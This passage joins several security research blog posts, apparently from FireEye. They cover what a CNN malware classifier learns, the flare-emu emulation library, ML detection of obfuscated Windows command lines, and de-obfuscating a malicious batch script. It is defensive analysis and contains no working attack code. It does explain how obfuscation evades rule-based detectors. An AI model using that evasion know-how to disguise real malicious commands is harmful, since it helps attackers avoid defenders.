For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and Filter 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) are lost, and the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: do the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method, which combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered malicious features and negative values indicating benign features.
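The shap package exposes this method as GradientExplainer. The sketch below is only meant to show the shape of the workflow, not our production pipeline: a tiny stand-in classifier is split so that the explained portion takes the already-embedded (float) sequence as input, because gradients cannot be taken with respect to discrete byte ids. The model, sizes, and data are all placeholders.

import numpy as np
import shap                      # pip install shap
import torch
import torch.nn as nn

class EmbeddedTail(nn.Module):
    """Stand-in classifier head that consumes the embedded byte sequence."""

    def __init__(self, embed_dim=8):
        super().__init__()
        self.net = nn.Sequential(nn.Conv1d(embed_dim, 16, kernel_size=8, stride=4),
                                 nn.ReLU(), nn.AdaptiveMaxPool1d(1), nn.Flatten(),
                                 nn.Linear(16, 1), nn.Sigmoid())

    def forward(self, x):                    # x: (batch, seq_len, embed_dim)
        return self.net(x.transpose(1, 2))

embed = nn.Embedding(257, 8)                 # stand-in embedding layer
model = EmbeddedTail().eval()

ids = torch.randint(0, 257, (18, 4096))      # placeholder encoded "files"
background = embed(ids[:16]).detach()        # background batch for SHAP
samples = embed(ids[16:]).detach()           # files we want to explain

explainer = shap.GradientExplainer(model, background)
shap_values = explainer.shap_values(samples)

# Collapse the embedding dimension to get one attribution per byte offset;
# positive values push toward malware, negative values toward goodware.
values = shap_values[0] if isinstance(shap_values, list) else shap_values
per_byte = np.asarray(values).sum(axis=-1)
print(per_byte.shape)                        # (2, 4096)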

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.
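As a toy illustration of how little is required to get started, the sketch below drives Unicorn’s Python bindings directly to run a tiny, hand-written x86 XOR-decode loop over a buffer in emulated memory; the stub and the encoded string are fabricated stand-ins for a routine you would normally lift out of a sample. flare-emu, introduced below, wraps this kind of setup so you rarely have to write it by hand.

from unicorn import Uc, UC_ARCH_X86, UC_MODE_32
from unicorn.x86_const import UC_X86_REG_ECX, UC_X86_REG_ESI

# Hand-written x86 stub: xor byte [esi], 0x41 / inc esi / loop start
# It XOR-decodes ECX bytes at ESI in place with the single-byte key 0x41.
CODE = bytes.fromhex("80364146e2fa")
CODE_ADDR, DATA_ADDR = 0x1000, 0x2000

secret = b"https://example.test/payload"            # fabricated "config" string
encoded = bytes(b ^ 0x41 for b in secret)           # what a sample might store

mu = Uc(UC_ARCH_X86, UC_MODE_32)
mu.mem_map(CODE_ADDR, 0x1000)                       # page for the decode stub
mu.mem_map(DATA_ADDR, 0x1000)                       # page for the encoded buffer
mu.mem_write(CODE_ADDR, CODE)
mu.mem_write(DATA_ADDR, encoded)

mu.reg_write(UC_X86_REG_ESI, DATA_ADDR)             # pointer to the encoded bytes
mu.reg_write(UC_X86_REG_ECX, len(encoded))          # loop counter

mu.emu_start(CODE_ADDR, CODE_ADDR + len(CODE))      # run until we fall off the stub
print(bytes(mu.mem_read(DATA_ADDR, len(encoded))).decode())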

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompression – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left either to open up a debugger and instrument the sample to decode the data for you, or to transpose the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks, both for individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D. This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.


    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant. As with the emulateRange API, options are provided for user-defined hooks, both for individual instructions and for when “call” instructions are encountered. An example use of the iterate API is the function argument tracking technique mentioned earlier in this post.


    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate an arbitrary blob of code, such as shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. As with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.


    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.

Examples

Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.


Figure 4: Calls to a timestamp conversion function


Figure 5: Simple example of flare-emu usage


Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.
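For readers who want a feel for what such a script looks like before opening the repository, here is a highly simplified sketch of the core idea: use iterate to reach every call to GetProcAddress and read the requested API name from the second argument. The linked sample and the README are authoritative; the callback signature and helper names shown here are paraphrased from the project documentation and should be treated as assumptions that may differ from the released API.

# Simplified IDAPython sketch (run inside IDA Pro with flare-emu installed).
# Signatures are assumptions; consult the flare-emu README for the real API.
import idc
import flare_emu

def getprocaddress_hit(eh, address, argv, userData):
    # argv[1] is assumed to hold the lpProcName pointer at the call site.
    api_name = eh.getEmuString(argv[1])
    print("0x%X: GetProcAddress(..., \"%s\")" % (address, api_name))

eh = flare_emu.EmuHelper()
target = idc.get_name_ea_simple("GetProcAddress")
eh.iterate(target, getprocaddress_hit)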

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-reference issues. If you have not read that blog post, I recommend reading it before continuing with this post, as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary, and it had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.


Figure 7: Objective-C IDB snippet before running objc2_analyzer


Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe that the instructions referencing selectors have been patched to reference the implementation function itself, making navigation easy. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them, as shown in Figure 9.


Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 has brought improvements to Objective-C code analysis and handling. However, as of the latest version at the time of writing (IDA Pro 7.2), there are still shortcomings that this tool mitigates, in addition to the immensely helpful comments that it adds. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.

Conclusion

flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. Either way, we hope you find value in using these new tools!

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of PowerShell and Windows command lines, respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) has demonstrated just how flexible these interpreters are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion, “simple” means generally short and relatively uncomplicated, but possibly still containing obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to the obfuscated/unobfuscated axis. The interplay of these two axes produces many boundary cases where simple heuristics to detect whether a script is obfuscated (e.g., the length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as malware authors evolve their techniques to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.
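A minimal sketch of the kind of encoding step described here: each character of the command line is mapped to its Unicode code point and the sequence is padded or truncated to a fixed length before it reaches the embedding layer. The fixed length, the reserved padding id, and the +1 shift are placeholders for illustration, not the values used in our model.

MAX_LEN = 1024   # placeholder fixed input length
PAD_ID = 0       # placeholder id reserved for padding

def encode_command_line(cmd, max_len=MAX_LEN):
    """Map each character to its Unicode code point, then pad or truncate."""
    ids = [ord(ch) + 1 for ch in cmd[:max_len]]      # +1 keeps 0 free for padding
    return ids + [PAD_ID] * (max_len - len(ids))

print(encode_command_line('cmd /c "set x=echo&&call %x% hello"')[:16])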

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.
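To make the feature list concrete, here is a rough sketch of how such statistics could be computed for a single command line before being fed to a gradient boosted tree. The character set, the regular expressions, and the feature set itself are illustrative rather than the exact features used in our model.

import math
import re
from collections import Counter

SPECIAL = set("^&|%!<>()\"'`,;=")     # illustrative "special" character set

def shannon_entropy(text):
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum((c / len(text)) * math.log2(c / len(text)) for c in counts.values())

def extract_features(cmd):
    n = max(len(cmd), 1)
    return {
        "length": len(cmd),
        "caret_count": cmd.count("^"),
        "pipe_count": cmd.count("|"),
        "whitespace_frac": sum(ch.isspace() for ch in cmd) / n,
        "special_frac": sum(ch in SPECIAL for ch in cmd) / n,
        "entropy": shannon_entropy(cmd),
        "cmd_count": len(re.findall("cmd", cmd, re.IGNORECASE)),
        "power_count": len(re.findall("power", cmd, re.IGNORECASE)),
    }

print(extract_features('c^m^d /c "s^et co=call&&%co% echo Hello"'))

The resulting dictionaries can then be vectorized and passed to any gradient boosted tree implementation for training.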

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example, a rule-based detector with a hand-crafted weighting scheme and a threshold, using features such as the proportion of special characters, the length of the command line, or the entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained on raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as the one in Figure 10, the GBT classifier confidently predicted non-obfuscated, assigning an obfuscation score of only 19.7 percent (the complement of its confidence in non-obfuscation). The CNN classifier, meanwhile, predicted non-obfuscated with a probability of roughly 50 percent – right at the decision boundary between obfuscated and non-obfuscated. The CNN model also produced more misclassifications than the Gradient Boosted Tree model. Both shortcomings are most likely the result of inadequate tuning of the CNN, not a fundamental limitation of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, they can usually be closed by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate that ML will take an increasingly important role, both at FireEye and across the rest of the cyber security industry.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

